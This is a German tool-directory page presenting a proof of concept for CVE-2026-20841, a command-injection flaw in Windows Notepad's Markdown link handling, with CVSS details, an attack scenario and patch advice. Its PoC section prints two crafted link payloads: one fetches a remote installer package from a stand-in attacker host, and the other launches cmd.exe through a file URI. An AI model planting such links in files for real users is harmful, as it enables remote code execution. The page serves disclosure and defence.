Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-20841-PoC — Proof-of-Concept, das eine Befehlsinjektion in Windows-Editor (Notepad) über manipulierte Markdown-Links demonstriert und so die Ausführung von Remote-Code ermöglicht. Enthält Angriffsvektoren, CVSS-Metriken und Anleitungen zur Behebung. | Kitploit
Tools/GitHubGitHub/dogukankurnaz/cve-2026-20841-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPapers & ForschungLernen & Bildung
GitHubdogukankurnaz/cve-2026-20841-poc

CVE-2026-20841-PoC

Proof-of-Concept, das eine Befehlsinjektion in Windows-Editor (Notepad) über manipulierte Markdown-Links demonstriert und so die Ausführung von Remote-Code ermöglicht. Enthält Angriffsvektoren, CVSS-Metriken und Anleitungen zur Behebung.

Repository anzeigen
2vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-20841 – Schwachstelle zur Remote-Codeausführung in der Windows-Notepad-App

Überblick über die Schwachstelle

FeldDetail
CVE-IDCVE-2026-20841
TitelSchwachstelle zur Remote-Codeausführung in der Windows-Notepad-App
AuswirkungRemote-Codeausführung
Maximaler SchweregradWichtig
CVSS v3.1 Basis / Zeitwert8.8 / 7.7
CVSS-VektorCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C
CWECWE-77: Unzureichende Neutralisierung spezieller Elemente in einem Befehl („Befehlsinjektion“)
Betroffenes ProduktWindows-Notepad-App (Microsoft-Store-Version, Builds vor 11.2510)
Zuweisende CNAMicrosoft
Veröffentlicht10. Februar 2026
Öffentlich bekannt gegebenNein
AusgenutztNein
Bewertung der AusnutzbarkeitAusnutzung weniger wahrscheinlich

Zusammenfassung

Eine unzureichende Neutralisierung spezieller Elemente in einem Befehl („Befehlsinjektion“) in der Windows-Notepad-App ermöglicht es einem nicht autorisierten Angreifer, Code über ein Netzwerk auszuführen.

Die moderne Windows-Notepad-App (über den Microsoft Store verteilt) hat Unterstützung für die Markdown-Darstellung eingeführt, die auch klickbare Hyperlinks umfasst. Die Schwachstelle besteht darin, dass Notepad URI-Schemata in Markdown-Links vor der Verarbeitung nicht ordnungsgemäß validiert und bereinigt. Ein Angreifer kann eine bösartige .md-Datei mit speziell gestalteten Links erstellen, die beim Anklicken durch den Benutzer unverifizierte Protokoll-Handler auslösen, um entfernte Inhalte zu laden und auszuführen.

CVSS v3.1-Metriken

Basismetriken

MetrikWert
AngriffsvektorNetzwerk
AngriffskomplexitätNiedrig
Erforderliche PrivilegienKeine
BenutzerinteraktionErforderlich
ScopeUnverändert
VertraulichkeitsauswirkungHoch
IntegritätsauswirkungHoch
VerfügbarkeitsauswirkungHoch

Zeitmetriken

MetrikWert
Reifegrad des Exploit-CodesUnbewiesen
AbhilfemaßnahmenOffizieller Fix
BerichtsvertrauenBestätigt

FAQ

Wie könnte ein Angreifer diese Schwachstelle ausnutzen?

Ein Angreifer könnte einen Benutzer dazu verleiten, einen bösartigen Link in einer in Notepad geöffneten Markdown-Datei anzuklicken, wodurch die Anwendung unverifizierte Protokolle startet, die entfernte Dateien laden und ausführen.

Was ist der Zielkontext der Remote-Codeausführung?

Gemäß der CVSS-Metrik ist der Angriffsvektor Netzwerk (AV:N) und eine Benutzerinteraktion ist erforderlich (UI:R). Der bösartige Code würde im Sicherheitskontext des Benutzers ausgeführt, der die Markdown-Datei geöffnet hat, wodurch der Angreifer dieselben Berechtigungen wie dieser Benutzer erhält.

Angriffsszenario

  1. Der Angreifer erstellt eine Markdown-Datei (.md), die bösartige Hyperlinks enthält.
  2. Das Opfer öffnet die Datei in der verwundbaren Version von Windows Notepad.
  3. Notepad rendert das Markdown und zeigt klickbare Links an.
  4. Wenn das Opfer auf den Link klickt, verarbeitet Notepad den URI ohne ordnungsgemäße Validierung.
  5. Dies löst Protokoll-Handler aus (z. B. ms-appinstaller://), die entfernte Payloads abrufen und ausführen können, oder file://-URIs, die direkt lokale ausführbare Dateien starten können.
  6. Der bösartige Code wird mit denselben Berechtigungen wie der angemeldete Benutzer ausgeführt.

Proof of Concept

Haftungsausschluss: Dieser Proof of Concept dient ausschließlich zu Bildungs- und autorisierten Sicherheitsforschungszwecken. Verwenden Sie ihn nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und strafbar.

Der PoC demonstriert zwei Angriffsvektoren über manipulierte Markdown-Links:

Vektor 1 – Installation entfernter Payloads durch Missbrauch von Protokoll-Handlern:

root@kitploit:~
[Klicken Sie hier, um das Dokument anzuzeigen](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)

Vektor 2 – Aufruf lokaler ausführbarer Dateien über Datei-URI:

root@kitploit:~
[Klicken Sie hier](file://C:/windows/system32/cmd.exe)

Demo

PoC-Demonstration

Abhilfemaßnahmen

  • Aktualisieren Sie Windows Notepad auf Build 11.2510 oder höher über den Microsoft Store.
  • Aktivieren Sie automatische App-Updates unter Windows-Einstellungen > Apps > Microsoft Store.
  • Öffnen Sie keine .md-Dateien aus nicht vertrauenswürdigen Quellen in Notepad.
  • Klicken Sie nicht auf Links in Markdown-Dateien, die Sie per E-Mail oder über nicht vertrauenswürdige Downloads erhalten haben.

Referenzen

  • MSRC – CVE-2026-20841
  • NVD – CVE-2026-20841
  • CVE.org – CVE-2026-20841

Rechtlicher Haftungsausschluss

Die in diesem Repository bereitgestellten Informationen dienen ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken. Dieser Proof of Concept wird geteilt, um Verteidigern zu helfen, die Schwachstelle zu verstehen und zu entschärfen. Der Autor ist nicht verantwortlich für jeglichen Missbrauch der hier bereitgestellten Informationen oder Werkzeuge. Holen Sie immer eine ordnungsgemäße schriftliche Genehmigung ein, bevor Sie Systeme auf Schwachstellen testen. Unbefugter Zugriff auf Computersysteme ist in den meisten Rechtsordnungen eine Straftat. Verwenden Sie dies verantwortungsvoll und ethisch.

Tool herunterladen